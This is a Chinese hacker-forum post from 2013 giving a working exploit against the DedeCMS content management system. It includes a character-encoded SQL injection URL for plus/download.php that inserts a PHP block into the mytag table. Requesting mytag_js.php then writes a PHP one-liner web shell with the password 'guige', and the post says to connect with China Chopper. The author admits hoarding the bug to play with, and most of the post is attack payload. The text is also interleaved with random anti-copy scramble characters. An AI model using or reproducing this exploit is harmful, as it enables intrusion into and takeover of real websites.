本帖最后由 土豆 于 2013-6-10 14:41 编辑 2 |3 w3 A! s2 `7 ?& r
, Y( o4 F, t& |: Q
1 @" W; A2 r/ G4 H- n
作者:鬼哥+ f" c' \% n: p& {% t% F
3 F- ?! F8 Z" B4 b% c( n( {
看贴不回,没JJ; ]4 l6 _" r4 |; q9 X
) E N. Q% q- D; k- T4 a1 @
漏洞大家都知道是哪个。
/ [8 w9 O+ x. j& @# {3 l$ ~ q3 _( ]- }% @
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。! q U, R, }! |1 j& \; Q
b$ J. \4 i& L, a) z9 E% B% R% u
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。& X0 Q- i( j; c' K/ V& h
% M |; q! g4 t: j
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
* T0 U# ^( ^4 V6 D& T" t; u5 v
4 C1 U2 K3 K E7 n! D% O: d8 Sgetshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。' l& v8 y5 V" u
6 p0 {" U+ c) M: d7 H
但是测试了下。。失败1 z; N. [0 c! B* s* j
J% U' G; R' y
原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。' Z+ K) t5 p; L5 n+ P( R
) Q- _4 T/ f7 _: e( w6 C$ c
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`7 t: |2 Q, R0 N; v4 m' S, c
! G* R+ Q8 j2 m% p0 T8 W
EXP:% m! H {0 O- P0 b/ O5 g3 F' }7 V
- [8 w4 u W- o/ l
http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96' d9 ` w1 \8 ?3 M
5 C2 d. D5 z) m. ]
, r* q' j9 t& \4 v2 l
成功增加。
& u0 L# z: i. M4 J3 k W& D$ z! D; O4 X: t
访问http://www.xxx.com/plus/mytag_js.php?aid=9013
( ?) ]; A3 y! Y) y# J生成一句话木马.
+ h. J# O% q0 o" m菜刀连接 http://www.xxx.com/plus/90sec.php 密码 guige: m1 A# k! G+ U- @) y" R
% [+ g L& D. M5 U测试OK。 ( S' @; d+ V$ n3 B, K" _/ c F
$ g/ W! i7 h. X% u( f
; E C4 V/ y; C; j. b |